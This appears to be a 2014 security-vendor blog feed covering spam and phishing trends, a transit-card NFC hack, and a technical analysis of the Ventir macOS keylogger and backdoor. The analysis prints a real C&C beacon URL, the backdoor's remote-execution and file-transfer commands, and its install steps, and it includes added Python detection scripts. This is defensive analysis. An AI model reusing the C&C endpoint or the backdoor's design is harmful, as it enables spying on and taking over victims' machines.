Secure List feed for B2B

Online headquarters of Kaspersky Lab security experts.

A false choice: the Ebola virus or malware?

Thu, 10/23/2014 - 09:31

In September we came across mentions of people in Africa suffering from the Ebola virus and unusual invitations to a conference of the World Health Organisation (WHO) in the subject line of so-called "Nigerian" emails.  The aim of the conmen was, as usual, to swindle money from trusting recipients who entered into conversation with the authors of the letters.

In October it was the turn of the cybercriminals, who used the tumult around the Ebola virus to send letters containing malware. Once again the WHO was indicated as the sender of the letters, which is unsurprising as this is the organisation that deals with various diseases and epidemics on a worldwide level.

In the text of the letters we detected, the evildoers tried to convince recipients that the WHO had prepared a file with general information and security measures that would help protect users and those around them from the deadly virus and other diseases. Furthermore, the recipient was asked to distribute this information to help the WHO.

To mask the real link a link abbreviation service was used, which finally redirected users to a popular cloud data storage service. There the criminals had stored the malware program Backdoor.Win32.DarkKomet.dtzn disguised as a document from the WHO. This malware is designed to steal personal data. We note that access to the file was blocked quite quickly by the service administrators and, probably for that reason, the evildoers decided to change their letter. The very next day our traps caught a similar communication supposedly from the WHO, only this time the archive with the same malware program was inserted into the letter itself.

Cybercriminals rarely miss a chance to use current events and the names of famous organisations to trick the recipients of their spam. And so, having fallen for the convincing header and failed to pay attention for even a moment, users risk compromising their personal data and surrendering control of their computer to criminals. It is worth remembering that modern anti-virus solutions provide protection but it is only the considered actions of users that can keep their personal data safe.

Spam in September 2014

Thu, 10/23/2014 - 07:00
Spam in the spotlight

In September, "Nigerian" scammers sent out stories relating to the breaking news of the Ebola epidemic. There was festive spam, focusing on both the US Labor Day celebration and the upcoming winter holidays: spammers have started to offer products and services for Christmas. A large part of the major theme mailings promoted products and services using popular social networking sites: the spammers promised an instant influx of new customers and income growth.

The Ebola virus in "Nigerian" spam

In July, the first reports about the Ebola outbreak in Africa appeared in the media. While the world's attention was focused on how to fight the epidemic and prevent it spreading further, scammers used the disease to create new stories for their "Nigerian" letters.

In September, we came across several mailings which mentioned Ebola. In addition to the popular "Nigerian" legends written supposedly on behalf of people with various diseases the fraudsters made up quite unusual stories. For example, an email from a rich Liberian lady dying from Ebola contained a long story about her children who died from the virus and about the local medical center which refused to help her. She was willing to donate more than $1.5 million to a recipient who would transfer this money to charities. The message contained a detailed description of the situation that is unusual for "Nigerian" letters. However, this long story was still nothing more than yet another trick to make recipients believe the story and start corresponding with the scammers.

The authors of another fraudulent mailing introduced themselves as an employee of the World Health Organization and tried an unusual tack to attract attention – the reader was invited to a conference where Ebola would be discussed along with other medical issues. The recipient was not only invited to participate in the conference as a guest but was also offered 350,000 Euro and an automobile for his work as the WHO Representative in the UK. If the victim was interested in the offer, he had to provide his personal data. Apparently, the scammers hoped that the offer of money and work in an international company would ease all the user's doubts.

Holiday spam

In early September, the United States celebrated Labor Day and the spammers were determined not to miss out on the event. Traditionally, in the run-up to the holidays people are attracted by discounts and sales. This time, companies selling print cartridges offered discounts not only for Labor Day but also the beginning of the new school year. Pharmaceutical spam advertising drugs for weight loss also offered discounts related to the holiday.

Spam traffic around the world also contained adverts for goods and services related to Christmas. English-language messages offered a Christmas party on board a ship and urged early booking to get the lowest prices. In addition, the spammers encouraged people to start thinking of buying Christmas gifts in September and order digital devices directly from Chinese manufacturers as well as ordering a Christmas tree for the holiday.

Earnings and advertising on social networking sites

Another major theme this month was spam messages advertising various ways to earn money online using popular social networking sites. Most often, spammers offered to create an individual profile or a group in Twitter, Facebook or LinkedIn, to design a page according to the concept of the company and the goods it sells, to provide the first subscribers as well as to create the primary content and begin to actively promote it. Naturally, all this came at a cost. After such a comprehensive approach to creating a community in a social network the authors of the mailings promised a sharp increase in the customer numbers and sales volumes. Users were asked to apply by following a link in the email.

Spammers also spent plenty of time offering professional business promotion by placing photos and videos on specialist social networking sites. The authors of these mailings also promised to provide their customers with the necessary number of subscribers, for example, in Instagram, to place the photos of goods and to achieve the first results within the next three days. The recipients were often invited to make a video presentation of the company or the product and to post it on the popular video hosting YouTube. The spammers also promised that users could make "an obscene amount of money" with the help of YouTube by spending just 40 minutes a day on it. However, these mailings were nothing more than adverts about yet another author marketing course on DVD. To buy the DVD the recipient needed to follow a link in the email to enter the necessary website and make an order.

In September, we also came across mailings containing invitations to seminars and webinars dedicated to the "art" of group and community administration on social networks. The authors of these training sessions promised to reveal all the secrets of an administrator's work (for example, on Facebook or LinkedIn), leading to a stable monthly income for students. To register for a webinar, the recipient had to click on the link in the email.

According to the authors of foreign language spam mailings, the most popular source for attracting new customers and revenue growth was, of course, Facebook. So the spammers proposed using the network to promote personal ads and to link specific redirects to posts and photos – in this case the number of potential customers would depend on the quality of the content and the willingness of the users to click the links published in the communities. To accomplish this, they suggested special software which could be bought via spam mailings. Sites with detailed descriptions of the software had been created a few months ago and their names contained such words as "customers", "income", "Facebook".

Spam for collectors

Among the most interesting mailings of the month were collector-oriented spam messages. English-language users were offered a free booklet on British medals from the First World War. The emails with the generous offer supposedly came from the SSAFA, a charity created to assist British war veterans and their families. However, the official website of this organization had no information on the promotion, while online feedback pointed out that the mailing was unsolicited. The message linked to an order page where recipients were asked to provide contact details including a phone number. This is one of the ways the fraudsters collect user personal data which will later be used for promotional purposes. For example, a phone database can be used for cold calls to sell goods and services.

Another mass mailing was distributed on behalf of a collector. In his emails he spoke about his hobby - collecting badges and stickers with the logos of various organizations. He wrote to different companies asking for samples for his collection. Although it's unlikely that these emails were fraudulent, they were unsolicited and therefore were classified as spam.

Statistics

The percentage of spam in email traffic

The percentage of spam in September's email traffic averaged 66.5%, which is 0.7 percentage points down from August. The amount of unsolicited email consistently decreased throughout the month – in early September the percentage of spam averaged 69.3% while in the end it dropped to 63.1%.

Sources of spam by country

In September, the Top 3 most popular sources of spam were as follows. The USA remained in first position (12%) although its contribution was down nearly 4 percentage points from the previous month. Vietnam moved from fourth to second place with 9.3%; up 4.6 percentage points. Russia was in third place with 5.8% - there was little change in its numbers and it dropped one place in the table.

Sources of spam around the world

China was in 4th position with 5.6% of all distributed spam; its contribution dropped by nearly 1 pp. It is followed by India (4.7%): with almost 2 pp growth this country rocketed from 10th in August to 5th in September.

South Korea (3.2%) also increased its share by 1.3pp and placed 7th, up eight from the previous month. Meanwhile, Germany (2.9%) lost 0.7 pp and fell from 6th to 9th place in September. The Top 10 was completed with Taiwan with 2.5% of all distributed spam. France, Spain and Italy also produced a little more than 2% of the world spam.

Sources of spam in Europe by country

Vietnam was September's leading source of spam sent to European users (11.1%). Next came the USA with 9.1% and Russia on 6%.

They are followed by China (5.3%), India (4.5%), Argentina (3.7%) and South Korea (3.5%). About 3% of European spam originated from each of Brazil, Germany and.

The rating also includes Taiwan (2.7%), Spain (2.6%), Italy (2.5%) and Mexico (2.3%) in 11th-14th place. Iran was in 15th position with 2.2% of spam sent to European users. The percentage of spam that originated from elsewhere did not exceed 2%.

Malicious attachments in email traffic

In September, the Top 10 malicious programs distributed via email were:

Top 10 malicious programs distributed via email

Dofoil: Trojan-Downloader.Win32.Dofoil.dx, Trojan-Downloader.Win32.Dofoil.dy and Trojan-Downloader.Win32.Dofoil.dz occupied 1st, 6th and 9th places respectively. This type of malware downloads other malicious programs onto the victim computer and uses them to steal user data (primarily passwords) which it then sends to the fraudsters.

Trojan-Spy.HTML.Fraud.gen was in 2nd position. As we wrote before, this piece of malware from the Fraud.gen family is a fake data entry HTML page that is sent to users by email, disguised as an important message from large commercial banks, online stores, software companies etc.

Trojan-Banker.HTML.PayPal.b came 4th. This malicious program appears in the form of an HTML page imitating a PayPal form. Recipients of an email containing this attachment are asked to fill in the form to update their PayPal account after the launch of the new IT security system. The German-language form includes fields like E-Mail Adresse, PayPal passwort, Vollständiger Name, Nachname der Mutter (Fakultativ), Geburtsdatum, Telefonnummer, Adresse, Stadt, Land, Postzahl, Kartennummer, Verfallsdatum, Kartenprüfnummer, VBV Passwort / MasterCard. It seems the fraudsters are targeting German-speaking PayPal users.

Trojan-Downloader.MSWord.Agent.ba and Trojan-Downloader.MSWord.Agent.bf placed 5th and 8th in the ranking. These programs imitate a .doc file with built-in macros written in Visual Basic for Applications (VBA), which are executed when opening the document. The macros download and run malicious software, such as representatives of the Andromeda family.

Trojan.Win32.Vundo.adc completed the list of the most popular malicious programs distributed via email. This program downloads other malware, for example, Trojan-Banker.Win32.Fibbit, which compromises the data passing through banking client applications. The Trojan intercepts keystrokes, copies data from the clipboard, searches for file certificates with the .jks extension, makes screenshots and tries to read the "keys.dat" file. All the stolen data is packed in the CAB archive and sent to the attacker's server.

Distribution of email antivirus detections by country

For several months in a row, the three countries with the most antivirus detections have been Germany, the UK and the USA, each jostling for position at the top. In September, Germany took the lead (9.11%) followed by the UK (8.45%) and the USA (8.26%).

Russia was a big mover once again – after unexpectedly rising to 4th place in August it lost 4.14 percentage points and dropped down to 13th.

Special features of malicious spam

In September many mailings containing malicious attachments dealt with matters of hiring and firing. We registered a mass mailing that told recipients their employment contract with an organization (the company name varied from email to email) had been terminated for violations of the company's internal policy. The messages even provided the number and date of the alleged violations. The email also stated that recipients had already been issued written warnings demanding improved behavior in future. However, since nothing had been done, the labor contract was terminated.

To appeal this decision the recipient was invited to consult a lawyer before a specified deadline. The email contained an attached archive with documents about the supposed violations. To view the document, the recipient had to open the attachment. In fact, though, the attachment contained a representative of the Trojan-Downloader.Win32.Cabby family. This malware downloads other malicious software onto a victim computer, including various modifications of the Zbot family of programs.

Phishing

In September, Kaspersky Lab's anti-phishing component registered 18,779,357 detections, 13,874,415 fewer than in the previous month. This decline in the amount of phishing was caused by the end of the summer slowdown and the beginning of the business season. It should also be noted that September is often a month for presentations and other major company events. In the run-up to these, phisher activity grows, leading to a spike in the number of fraudulent attempts at the end of the summer.

In September, Brazil (17.8%) was once again the leading country for phishing attacks, even though its share was down 1.7 percentage points. Australia dropped to 3rd with 11.1% of all antivirus detections. Second came India (13.4%). The UAE (10.5%) and France (10.4%) were in 4th and 5th positions respectively.

The geography of phishing attacks*, September 2014

* The percentage of users on whose computers the Anti-Phishing component was activated, from the total number of all Kaspersky Lab users

Top 10 countries by the percentage of attacked users:

      Country       % of users
  1   Brazil        17.8
  2   India         13.4
  3   Australia     11.2
  4   UAE           10.5
  5   France        10.4
  6   Canada        9.9
  7   China         9.9
  9   Colombia      9.4
  8   Bangladesh    9.0
  10  UK            8.0

Targets of attacks by organization

The statistics on phishing targets are based on detections made by Kaspersky Lab's anti-phishing component. It is activated every time a user enters a phishing page that has not previously been included in Kaspersky Lab databases. It does not matter how the user enters this page – by clicking the link contained in a phishing email or in the message in a social network or, for example, as a result of malware activity. After the activation of the security system, the user sees a banner in the browser warning of a potential threat.

In September, Global Internet Portals were again the leading category among the organizations most often attacked by phishers with 24.7%, even though the share decreased by 6.1 pp. The contribution of Social networks (20.2%) rose by 2.8 pp from the previous month.

Organizations most frequently targeted by phishers, by category – September 2014

Financial phishing accounted for 36.9% of all detections made by Kaspersky Lab's anti-phishing component, a 1.7 pp growth compared with the previous month. The percentage of detections affecting Banks accounted for 18.9% (+0.5pp), followed by online stores (11.4%, +1.4%) and E-payment systems (7.3%, +0.5%).

Top 3 organizations most frequently targeted by phishers

      Organization  % of detections
  1   Facebook      11.16%
  2   Yahoo!        7.10%
  3   Google        6.31%

In September, Facebook (11.1%) was most heavily targeted by phishers: its share was up 1.1 pp. Yahoo came 2nd with 7.1% of all Anti-Phishing component detections. The share of Google services halved compared to August and accounted for 6.3%, placing this organization 3rd.

September's spam traffic contained phishing mailings aimed at stealing logins and passwords to accounts with the popular Chinese online store Alibaba.com. The scammers tried to convince recipients to update their accounts or confirm their use, with reference to a new security system and account maintenance. The design of the fake messages used the official logo and the Auto Signature of Alibaba.com as well as the standard anti-virus notification about the absence of threats in the email. The 'From' field named Alibaba.com as the sender and the sender's address contained mainly legitimate domain names. However, on closer examination, an observant recipient could notice spelling mistakes in the addresses of senders and see domain names which obviously did not belong to the company.

Phishing pages were included directly in the fake emails and had a similar design. Recipients had to fill in the fields entering not only email addresses and passwords but also company names, countries of residence and mobile phone numbers. This way the fraudsters collected additional information about their victims for use in future scams.

Conclusion

In September, the percentage of spam in email traffic decreased by 0.7pp and averaged 66.5%. The main distributors of spam were the USA (12%), Vietnam (9.3%) and Russia (5.8%).

A Trojan downloader from the Dofoil family topped the rating of the most popular malware spread via email. This malicious program is used to download other malware onto victim computers.

In September, Kaspersky Lab's anti-phishing component registered 18,779,357 detections. According to the statistics, 17.8% of all detections targeted the users in Brazil. Australia, which was August's leader, moved down to 3rd position (11.1%). Global Internet Portals remained the leading category among the organizations most often attacked by phishers with 24.7% of all attacks. Financial phishing accounted for 36.9% of all detections made by Kaspersky Lab's anti-phishing component, a 1.7 pp growth compared with the previous month. In September's Top 3 organizations most frequently targeted by phishers, Facebook took the lead with 11.1% of all detections.

In September, "Nigerian" scammers switched their attention from events in Ukraine to health issues, in particular to the Ebola virus which was rarely far from the headlines this month.

Promotional mailings offered goods and services dedicated to America's Labor Day celebrations, as well as to the popular winter holidays celebrated worldwide. From now on we expect to see a sharp rise in the percentage of spam dedicated to Christmas and New Year festivities until it reaches its December peak.

Leave your passwords at the Checkout Desk

Thu, 10/23/2014 - 04:20

Hotels, restaurants and airports used to offer customers free tablets while using their facilities. Recently while attending an event and staying in one such hotel, I had the chance to use a free iPad especially installed in my room.

To my surprise, it not only contained the event agenda and provided a free WiFi connection, but also included a lot of private personal information from previous guests who had stayed in the same room.

When I speak about private personal information, I mean accounts with pre-saved passwords, authorized sessions on social networks, search results from the browser (mostly pornographic content), full contacts automatically saved into the address book, iMessages and even a pregnancy calculator with real information. It was not even hard to figure out the identity of the woman who had used it, since she also left her personal contact information on the device.

Having full names and email addresses cached on the device, it was not hard to Google a little bit and find out that some of the users were very public people working for the government of the country where I was staying.

Most of the sessions were still open, even allowing the posting / sending of messages in the name of the user.

This is completely unacceptable from a security perspective. Basically, a potential attacker had the chance not only to read sent and received messages but also to impersonate the victim by sending messages in their name.

I also see this scenario as a perfect personal data collector for high profile spear phishing campaigns. On the other hand, if a potential attacker came from a classic cybercrime sphere, they might blackmail their victims. Moreover, it would be extremely easy for the criminal to do this, since they would have all kinds of data of the victims, including the name of pornographic movies watched on each specific date and time. Bearing in mind that some of the potential victims are public people and work for the government, most probably such blackmail would be successful.

So, what's wrong here? Well, I would say everything. First, it is unwise to use a free public device for personal and private communication. You just never know if the device is backdoored or who might be behind such hospitality. Second, if a public facility wants to offer its guests free portable devices for the duration of their stay, it's important that such devices are properly configured first, to apply sensible security policies such as not storing personal information, not saving passwords and so on.

Maybe I'm too suspicious, but having an unknown and untrusted device like a tablet in my room, which is equipped with an embedded camera and a mic, I just preferred to switch it off and store it inside a drawer. I had to do this every afternoon since the cleaning staff put it back on the desk every day I was at the hotel.

You also have to remember that, even if such a free device is properly configured and does not visibly store any private information, you can't be sure that the next guest is not an expert in forensic analysis, in which case they could just take an image of the whole device and then recover your personal information step by step.

You may follow me on twitter: @dimitribest

Android NFC hack allows users to have free rides on public transportation

Tue, 10/21/2014 - 12:39

"Tarjeta BIP!" is the electronic payment system used in Chile to pay for public transportation via NFC incorporated in the user's smartphone. Numerous projects enabling mobile NFC ticketing for public transportation have been already executed worldwide. This is a trend. It means that criminal minds should be interested in it. Moreover, they are.

More and more people keep talking about the feature of payments via NFC. The problem in this particular case is that somebody reversed the "Tarjeta BIP!" cards and found a means to re-charge them for free. So, on Oct. 16 the very first widely-available app for Android appeared, allowing users to load these transportation cards with 10k Chilean pesos, a sum equal to approximately $17 USD.

MD5 (PuntoBIP.apk) = 06a676fd9b104fd12a25ee5bd1874176

Immediately after it appeared on the Internet, many users downloaded it and proved they were able to recharge their travel cards. All they had to do was install the mentioned app on an NFC-capable Android device, hold the travel card to the phone and then push the button "Cargar 10k", which means "Refill the card with 10,000" Chilean pesos.

According to the metadata of the .dex file package, it was compiled on October 16, 2014 and is 884.5 kB (884491 bytes) in size. The feature it incorporates interacts directly with the NFC port: android.hardware.nfc

The app has four main features: "número BIP" - to get the number of the card, "saldo BIP" - to get the available balance, "Data carga" - to refill available balance and finally, maybe the most interesting is "cambiar número BIP" - allowing the user to change the card number altogether. Why would we say this last feature is the most interesting? Well, a source suggested the authorities were going to block fraudulently refilled BIP cards. However, as we can see, the app is able to change the BIP number.

Since the original links to download the app were taken down, new links appeared, now pointing to new servers and actually hosting a new app:

MD5 (PuntoBIP-Reloaded.apk) = 2c20d1823699ae9600dad9cd59e03021

This is a modified version of the previous app, compiled on the next business day, Oct 17, 2014, and a lot bigger: 2.7 MB (2711229 bytes). It includes an advertisement module which shows ads via the doubleclick network.

Since both apps allow users to hack a legitimate application, they are now detected by Kaspersky as HEUR:HackTool.AndroidOS.Stip.a

Since the app is a hot one and a lot of people from Chile are looking for it, I expect some bad guys to come along and create fake similar apps but trojanized to infect mobile users and take some advantage of their interest.

At the same time, it is important to mention that mobile payments are getting more and more popular. NFC is one of the most promising ports in this field. This is a good example of how fresh new payment schemes often present the same old problems.

Thanks to Roman Unuchek for his analytical insights.

You may follow me on twitter: @dimitribest

The Ventir Trojan: assemble your MacOS spy

Thu, 10/16/2014 - 10:00

We got an interesting file (MD5 9283c61f8cce4258c8111aaf098d21ee) for analysis a short while ago. It turned out to be a sample of modular malware for MacOS X. Even after preliminary analysis it was clear that the file was not designed for any good purpose: an ordinary 64-bit mach-o executable contained several more mach-o files in its data section; it set one of them to autorun, which is typical of Trojan-Droppers.

Further investigation showed that a backdoor, a keylogger and a Trojan-Spy were hidden inside the sample. It is particularly noteworthy that the keylogger uses an open-source kernel extension. The extension's code is publicly available, for example, on GitHub!

Depending on their purpose, these files are detected by Kaspersky Lab antivirus solutions as Trojan-Dropper.OSX.Ventir.a, Backdoor.OSX.Ventir.a, Trojan-Spy.OSX.Ventir.a and not-a-virus:Monitor.OSX.LogKext.c.

Source file (Trojan-Dropper.OSX.Ventir.a)

As soon as it is launched, the dropper checks whether it has root access by calling the geteuid() function. The result of the check determines where the Trojan's files will be installed:

  • If it has root access, the files will be installed in /Library/.local and /Library/LaunchDaemons;
  • If it does not have root access, the files will be installed in ~/Library/.local and ~/Library/LaunchAgents ("~" stands for the path to the current user's home directory).

All files of the Trojan to be downloaded to the victim machine are initially located in the "__data" section of the dropper file.

Location of the Trojan's files inside the dropper

As a result, the following files will be installed on the infected system:

  1. Library/.local/updated – re-launches files update and EventMonitor in the event of unexpected termination.
  2. Library/.local/reweb – used to re-launch the file updated.
  3. Library/.local/update – the backdoor module.
  4. Library/.local/libweb.db – the malicious program's database file. Initially contains the Trojan's global settings, such as the C&C address.
  5. Library/LaunchAgents (or LaunchDaemons)/com.updated.launchagent.plist – the properties file used to set the file Library/.local/updated to autorun using the launchd daemon.
  6. Depending on whether root access is available:

    A) if it is – /Library/.local/kext.tar. The following files are extracted from the archive:

    • updated.kext – the driver that intercepts user keystrokes
    • Keymap.plist – the map which matches the codes of the keys pressed by the user to the characters associated with these codes;
    • EventMonitor – the agent which logs keystrokes as well as certain system events to the following file: Library/.local/.logfile.

    B) if it isn't – ~/Library/.local/EventMonitor. This is the agent that logs the current active window name and the keystrokes to the following file: Library/.local/.logfile

After installing these files, the Trojan sets the file updated to autorun using launchctl – the standard console utility (launchctl load %s/com.updated.launchagent.plist command).

Next, if root access is available, the dropper loads the logging driver into the kernel using the standard OS X utility kextload (kextload /System/Library/Extensions/updated.kext command).

After that, Trojan-Dropper.OSX.Ventir.a launches the file reweb and removes itself from the system.
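The install locations listed above translate directly into a host sweep. The following is an added example, not code from the original article: it checks a mounted filesystem (or a live system) for the files, the launchd property list and the kernel extension named in the text. The function names, the sample user "alice" and the plist contents written by demo() are assumptions made for illustration.

```python
import os
import plistlib
import tempfile

# File names the article lists under Library/.local, plus the keystroke log.
LOCAL_FILES = ("updated", "reweb", "update", "libweb.db",
               "kext.tar", "EventMonitor", ".logfile")
PLIST_NAME = "com.updated.launchagent.plist"
KEXT_PATH = os.path.join("System", "Library", "Extensions", "updated.kext")


def launchd_target(plist_path):
    """Return the program a launchd plist starts, or None if unreadable."""
    try:
        with open(plist_path, "rb") as fh:
            data = plistlib.load(fh)
    except Exception:
        return None  # unreadable or malformed plist: still reported, no target
    if not isinstance(data, dict):
        return None
    args = data.get("ProgramArguments") or []
    return data.get("Program") or (args[0] if args else None)


def sweep(fs_root="/", homes=()):
    """Return findings for the root-mode and the per-user install layout."""
    bases = [(os.path.join(fs_root, "Library"), "LaunchDaemons", "root")]
    bases += [(os.path.join(h, "Library"), "LaunchAgents", "user")
              for h in homes]
    findings = []
    for library, launch_dir, mode in bases:
        for name in LOCAL_FILES:
            path = os.path.join(library, ".local", name)
            if os.path.lexists(path):
                findings.append({"mode": mode, "kind": "file", "path": path})
        plist = os.path.join(library, launch_dir, PLIST_NAME)
        if os.path.lexists(plist):
            findings.append({"mode": mode, "kind": "launchd", "path": plist,
                             "target": launchd_target(plist)})
    kext = os.path.join(fs_root, KEXT_PATH)
    if os.path.lexists(kext):
        findings.append({"mode": "root", "kind": "kext", "path": kext})
    return findings


def demo():
    """Build a constructed user-mode install in a temp dir and sweep it."""
    with tempfile.TemporaryDirectory() as root:
        home = os.path.join(root, "Users", "alice")  # constructed user
        local = os.path.join(home, "Library", ".local")
        agents = os.path.join(home, "Library", "LaunchAgents")
        os.makedirs(local)
        os.makedirs(agents)
        os.makedirs(os.path.join(root, "Library"))  # clean system-wide tree
        for name in ("updated", "reweb", "update", "libweb.db",
                     "EventMonitor"):
            open(os.path.join(local, name), "wb").close()
        # Constructed plist contents; the article does not show the real file.
        with open(os.path.join(agents, PLIST_NAME), "wb") as fh:
            plistlib.dump({"Label": "com.updated.launchagent",
                           "ProgramArguments": [os.path.join(local, "updated")],
                           "RunAtLoad": True}, fh)
        return sweep(root, [home])


if __name__ == "__main__":
    for finding in demo():
        print(finding["mode"], finding["kind"], finding["path"])
```

On a live Mac, call sweep("/", homes) with the home directories under /Users; on a forensic image, pass the mount point as fs_root.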

Updated and reweb files

The file updated terminates all processes with the name reweb (killall -9 reweb command). After that, it regularly checks whether the processes EventMonitor and update are running and restarts them if necessary.

The file reweb terminates all processes with the names updated and update and then runs the file Library/.local/updated.

Update (Backdoor.OSX.Ventir.a) file

The backdoor first allocates the field values from the config table of the libweb.db database to local variables for further use.

To receive commands from C&C, the malware uses an HTTP GET request in the following format: http://220.175.13.250:82/macsql.php?mode=getcmd&key=1000&udid=000C29174BA0, where key is some key stored in libweb.db in the config table; udid is the MAC address and 220.175.13.250:82 is the IP address and port of the C&C server.

This request is sent regularly at short intervals in an infinite loop.
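The request format and its regular repetition give a network-side detection that keeps working if the C&C address changes. The following is an added example, not code from the original article: it scans web proxy log lines for the getcmd URL shape and flags clients that repeat it at short intervals. The log line format, the thresholds and every sample line except the article's own URL are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

KNOWN_C2 = "220.175.13.250:82"            # C&C address quoted in the article
UDID_RE = re.compile(r"[0-9A-Fa-f]{12}")  # MAC address without separators


def parse_beacon(url):
    """Return (host, udid) if the URL has the getcmd request shape."""
    parts = urlsplit(url)
    if not parts.path.endswith("/macsql.php"):
        return None
    query = parse_qs(parts.query)
    if query.get("mode") != ["getcmd"] or "key" not in query:
        return None
    udid = query.get("udid", [""])[0]
    if not UDID_RE.fullmatch(udid):
        return None
    return parts.netloc, udid.upper()


def find_beaconing(log_lines, min_hits=3, max_gap_s=120):
    """Flag clients whose matching requests are periodic or hit the known C&C.

    Assumed line format: "<ISO time> <client ip> <method> <url>".
    min_hits and max_gap_s are assumptions; tune them to the proxy's traffic.
    """
    hits = defaultdict(list)
    for line in log_lines:
        fields = line.split()
        if len(fields) != 4 or fields[2] != "GET":
            continue
        try:
            stamp = datetime.strptime(fields[0], "%Y-%m-%dT%H:%M:%S")
        except ValueError:
            continue  # skip malformed timestamps rather than abort the sweep
        beacon = parse_beacon(fields[3])
        if beacon:
            hits[(fields[1],) + beacon].append(stamp)

    alerts = []
    for (client, host, udid), stamps in sorted(hits.items()):
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        reasons = []
        if len(stamps) >= min_hits and all(g <= max_gap_s for g in gaps):
            reasons.append("periodic")
        if host == KNOWN_C2:
            reasons.append("known-c2")
        if reasons:
            alerts.append({"client": client, "host": host, "udid": udid,
                           "hits": len(stamps), "reasons": reasons})
    return alerts


def _line(time, client, host, udid, page="macsql.php"):
    """Build one constructed log line in the assumed format."""
    return (f"2014-10-16T{time} {client} GET "
            f"http://{host}/{page}?mode=getcmd&key=1000&udid={udid}")


# Constructed sample log. 203.0.113.9 is a documentation address standing in
# for a relocated C&C server; intranet.example is a benign look-alike.
SAMPLE_LOG = [
    _line("10:00:05", "10.0.0.23", KNOWN_C2, "000C29174BA0"),
    _line("10:00:35", "10.0.0.23", KNOWN_C2, "000C29174BA0"),
    _line("10:01:05", "10.0.0.23", KNOWN_C2, "000C29174BA0"),
    _line("10:00:10", "10.0.0.42", "203.0.113.9:82", "001122aabbcc"),
    _line("10:00:50", "10.0.0.42", "203.0.113.9:82", "001122aabbcc"),
    _line("10:01:30", "10.0.0.42", "203.0.113.9:82", "001122aabbcc"),
    _line("10:05:00", "10.0.0.50", KNOWN_C2, "0A1B2C3D4E5F"),
    _line("10:06:00", "10.0.0.60", "intranet.example", "000C29174BA0",
          page="report.php"),
    _line("10:07:00", "10.0.0.61", "203.0.113.9:82", "not-a-mac"),
]

if __name__ == "__main__":
    for alert in find_beaconing(SAMPLE_LOG):
        print(alert)
```

The udid value in each alert is the infected machine's MAC address, which helps locate the host behind a NAT or a shared proxy.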

The backdoor can process the following commands from C&C:

  • reboot – restart the computer;
  • restart – restart the backdoor by launching reweb file;
  • uninstall – completely remove the backdoor from the system;
  • show config – send data from the config table to the C&C server;
  • down exec – update the file update, download it from the C&C-server;
  • down config – update configuration file libweb.db, download it from the C&C server;
  • upload config – send the file libweb.db to the C&C server;
  • update config:[parameters] – update the config table in the libweb.db database file; values of fields from the table are sent as parameters;
  • executeCMD:[parameter] – execute the command specified in the parameter using the function popen(cmd, "r"); send the command's output to the C&C server;
  • executeSYS:[parameter] – execute the command specified in the parameter using the function system(cmd);
  • executePATH:[parameter] – run file from the Library/.local/ directory; the file name is sent in the parameter;
  • uploadfrompath:[parameter] – upload file with the name specified in the parameter from the Library/.local/ directory to the C&C server;
  • downfile:[parameters] – download file with the name specified in a parameter from the C&C server and save it to the path specified in another parameter.

Some of the commands processed by the backdoor module

EventMonitor (Trojan-Spy.OSX.Ventir.a) file

This file is downloaded to the system if the dropper cannot get root access. Once launched, Trojan-Spy.OSX.Ventir.a installs its own system event handler using Carbon Event Manager API functions. The new handler intercepts all keystroke events and logs them to the file ~/Library/.local/.logfile. Modifier buttons (e.g., shift) are logged as follows: [command], [option], [ctrl], [fn], [ESC], [tab], [backspace], etc.

Keyboard event handler

Immediately before processing a keystroke, the malware determines the name of the process whose window is currently active. To do this, it uses GetFrontProcess and CopyProcessName functions from Carbon API. The name of the process is also logged as [Application {process_name} is the frontwindow]. This enables the Trojan's owner to determine in which application the phrase logged was entered.

kext.tar (not-a-virus:Monitor.OSX.LogKext.c) file

As mentioned above, the kext.tar archive is downloaded to the infected computer if Trojan-Dropper.OSX.Ventir has successfully got root access. The archive contains three files:

  • updated.kext
  • EventMonitor
  • Keymap.plist

The updated.kext software package is an open-source kernel extension (kext) designed to intercept keystrokes. This extension has long been detected by Kaspersky Lab products as not-a-virus:Monitor.OSX.LogKext.c and the source code (as mentioned earlier) is currently available to the general public.

The file Keymap.plist is a map which matches the codes of keys pressed to their values. The file EventMonitor uses it to determine key values based on the codes provided to it by the file updated.kext.

The file EventMonitor is an agent file that receives data from the updated.kext kernel extension, processes it and records it in the /Library/.local/.logfile log file. Below is a fragment of the log that contains a login and password intercepted by the Trojan:

As the screenshot demonstrates, as soon as a victim enters the username and password to his or her email account on yandex.ru, the data is immediately logged and falls into the cybercriminals' hands.

This threat is especially significant in view of the recent leaks of login and password databases from Yandex, Mail.ru and Gmail. It is quite possible that malware from the Ventir family was used to supply data to the databases published by cybercriminals.

In conclusion, it should be noted that Trojan-Dropper.OSX.Ventir.a with its modular structure is similar to the infamous Trojan.OSX.Morcut (aka OSX/Crisis), which had approximately the same number of modules with similar functionality. Using open-source software makes it much easier for cybercriminals to create new malware. This means we can safely assume that the number of Trojan-Spy programs will only grow in the future.

Microsoft Security Updates October 2014

Tue, 10/14/2014 - 18:23

Update (2014.10.15) - administrative notes for preparation... Friends on Twitter let me know their update cycle took close to 20 minutes on Windows 7. Yesterday, others on 8.1 told me their update download was around a gig, for some it was ~200 mb. Also, this cycle likely requires a reboot for everyone to complete.

*******

This morning was possibly one of the most information rich in the history of Microsoft's patch Tuesdays. Last month, we pointed out the Aurora Panda/DeputyDog actor was losing an IE 0day being patched, and that seemed unusual. This month, several vulnerabilities abused with 0day exploits by known APT actors are being patched and the actors are being publicly noted. So today Microsoft pushes out eight security bulletins MS14-056 through MS14-063, including three rated critical.

The most interesting of today's vulnerabilities are two that are enabled by Windows functionality, but are useful for spearphishing targets with Office-type data file attachments - an Excel file, PowerPoint Show, Word document, and so on. The first of the two reminds us of the Duqu attacks. MS14-058 patches yet another kernel-level font handling flaw, CVE-2014-4148, the same kind of issue seen in the Duqu spearphish exploits. This one is rated critical by Microsoft. No one particular actor has been associated with this attack or exploit just yet.

